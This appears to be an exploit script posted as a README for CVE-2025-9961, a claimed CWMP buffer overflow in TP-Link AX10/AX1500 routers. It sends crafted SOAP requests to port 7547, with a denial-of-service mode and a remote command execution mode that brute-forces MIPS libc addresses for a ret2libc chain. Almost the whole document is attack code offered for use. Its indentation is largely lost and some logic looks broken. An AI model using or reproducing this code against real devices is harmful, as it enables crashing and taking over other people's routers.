README.md
Rendering markdown...
#!/usr/bin/env python3
import sys
import argparse
import socket
import struct
import time
from typing import Optional, Tuple, List
from dataclasses import dataclass
from enum import Enum
class ExploitResult(Enum):
    """Status labels used as return values by the attempt methods in this file.

    Each member's value is the lowercase string form of its name.
    """

    SUCCESS = "success"
    CRASHED = "crashed"
    FAILED = "failed"
    ERROR = "error"
@dataclass
class TargetConfig:
    """Connection settings for a single remote endpoint."""

    # Host name or IP address; passed as the first element of the
    # (host, port) tuple given to socket.connect().
    host: str
    # TCP port to connect to; defaults to 7547.
    port: int = 7547
    # Value handed to socket.settimeout(); defaults to 10.
    timeout: int = 10
class TPLinkCWMPExploit:
SOAP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<SOAP-ENV:Header>
<cwmp:ID SOAP-ENV:mustUnderstand="1">1</cwmp:ID>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<cwmp:SetParameterValues>
<ParameterList SOAP-ENC:arrayType="cwmp:ParameterValueStruct[1]">
<ParameterValueStruct>
<Name>{param_name}</Name>
<Value xsi:type="xsd:string">{payload}</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>exploit</ParameterKey>
</cwmp:SetParameterValues>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
HTTP_TEMPLATE = """POST /cwmpWeb/inform HTTP/1.1\r
Host: {host}:{port}\r
Content-Type: text/xml; charset=utf-8\r
Content-Length: {length}\r
SOAPAction: ""\r
\r
{body}"""
LIBC_SYSTEM_OFFSETS = [
0x0003ada4,
0x0003b000,
0x0003c000,
0x00040000,
0x0003a000
]
LIBC_BASES_MIPS = [
0x2aaf0000,
0x2ab00000,
0x2ab10000,
0x2ab20000,
0x2ab30000,
0x77f00000,
0x77e00000
]
def __init__(self, config: TargetConfig):
self.config = config
def check_alive(self) -> bool:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.config.timeout)
sock.connect((self.config.host, self.config.port))
sock.close()
return True
except Exception:
return False
def create_overflow_payload(self, command: str, libc_base: int, system_offset: int) -> bytes:
padding = b"A" * 512
system_addr = libc_base + system_offset
rop_chain = struct.pack("<I", system_addr)
rop_chain += struct.pack("<I", 0x41414141)
rop_chain += command.encode() + b"\x00"
payload = padding + rop_chain
return payload
def create_dos_payload(self, size: int = 1024) -> bytes:
return b"A" * size
def send_soap_request(self, soap_body: str) -> Tuple[bool, str]:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.config.timeout)
sock.connect((self.config.host, self.config.port))
http_request = self.HTTP_TEMPLATE.format(
host=self.config.host,
port=self.config.port,
length=len(soap_body),
body=soap_body
)
sock.sendall(http_request.encode())
try:
response = sock.recv(4096).decode(errors='ignore')
except socket.timeout:
response = ""
sock.close()
return True, response
except Exception as e:
return False, str(e)
def trigger_overflow(self, payload: bytes) -> ExploitResult:
soap_body = self.SOAP_TEMPLATE.format(
param_name="Device.ManagementServer.URL",
payload=payload.decode(errors='replace')
)
success, response = self.send_soap_request(soap_body)
if not success:
if "Connection refused" in response or "reset" in response.lower():
return ExploitResult.CRASHED
return ExploitResult.ERROR
if "200" in response or "500" in response:
return ExploitResult.SUCCESS
return ExploitResult.FAILED
def dos_attack(self, payload_sizes: List[int]) -> ExploitResult:
for size in payload_sizes:
payload = self.create_dos_payload(size)
result = self.trigger_overflow(payload)
if result == ExploitResult.CRASHED:
return ExploitResult.CRASHED
time.sleep(1)
if not self.check_alive():
return ExploitResult.CRASHED
return ExploitResult.FAILED
def rce_attack(self, command: str) -> ExploitResult:
for libc_base in self.LIBC_BASES_MIPS:
for system_offset in self.LIBC_SYSTEM_OFFSETS:
payload = self.create_overflow_payload(command, libc_base, system_offset)
result = self.trigger_overflow(payload)
if result == ExploitResult.CRASHED:
time.sleep(3)
if not self.check_alive():
continue
time.sleep(0.5)
return ExploitResult.SUCCESS
def parse_arguments() -> argparse.Namespace:
    """Parse the process command line and return the resulting namespace.

    The parser accepts one positional ``target`` plus the optional
    ``-p/--port`` (int, default 7547), ``-c/--command``,
    ``-t/--timeout`` (int, default 10), ``--dos`` and ``--check-only``
    flags. Arguments are read from ``sys.argv`` by ``parse_args()``.

    Returns:
        The populated ``argparse.Namespace``.
    """
    cli = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description="CVE-2025-9961: TP-Link AX10/AX1500 CWMP Buffer Overflow",
    )

    # (flags, keyword settings) pairs, registered in declaration order so the
    # generated help output lists the options in the same sequence.
    option_table = (
        (("target",), {"help": "Target IP address"}),
        (("-p", "--port"), {"type": int, "default": 7547, "help": "CWMP port"}),
        (("-c", "--command"), {"help": "Command to execute (RCE mode)"}),
        (("-t", "--timeout"), {"type": int, "default": 10, "help": "Socket timeout"}),
        (("--dos",), {"action": "store_true", "help": "DoS mode only"}),
        (
            ("--check-only",),
            {"action": "store_true", "help": "Only check if CWMP is open"},
        ),
    )
    for flags, settings in option_table:
        cli.add_argument(*flags, **settings)

    return cli.parse_args()
def main() -> int:
args = parse_arguments()
config = TargetConfig(
host=args.target,
port=args.port,
timeout=args.timeout
)
exploit = TPLinkCWMPExploit(config)
print(f"\n[*] Target: {config.host}:{config.port}")
print(f"[*] CVE-2025-9961: TP-Link CWMP Buffer Overflow\n")
if not exploit.check_alive():
print("[-] CWMP port is not reachable")
print("[*] Note: CWMP runs on port 7547 and may need ISP/ACS access")
return 1
print("[+] CWMP port is open")
if args.check_only:
print("[*] Check only mode - target has CWMP exposed")
return 0
if args.dos:
print("[*] Running DoS attack...")
payload_sizes = [512, 1024, 2048, 4096]
for size in payload_sizes:
print(f"[*] Sending payload size: {size}")
payload = exploit.create_dos_payload(size)
result = exploit.trigger_overflow(payload)
time.sleep(2)
if not exploit.check_alive():
print(f"\n[!] TARGET CRASHED - DoS successful at size {size}")
return 0
print("[?] Target may still be alive")
return 2
if args.command:
print(f"[*] Attempting RCE with command: {args.command}")
print("[*] This uses ret2libc with ASLR brute force")
print("[*] May require multiple attempts...")
result = exploit.rce_attack(args.command)
print(f"\n[+] Attack completed - check if command executed")
return 0
print("[*] No mode specified. Use --dos or -c <command>")
return 1
if __name__ == "__main__":
sys.exit(main())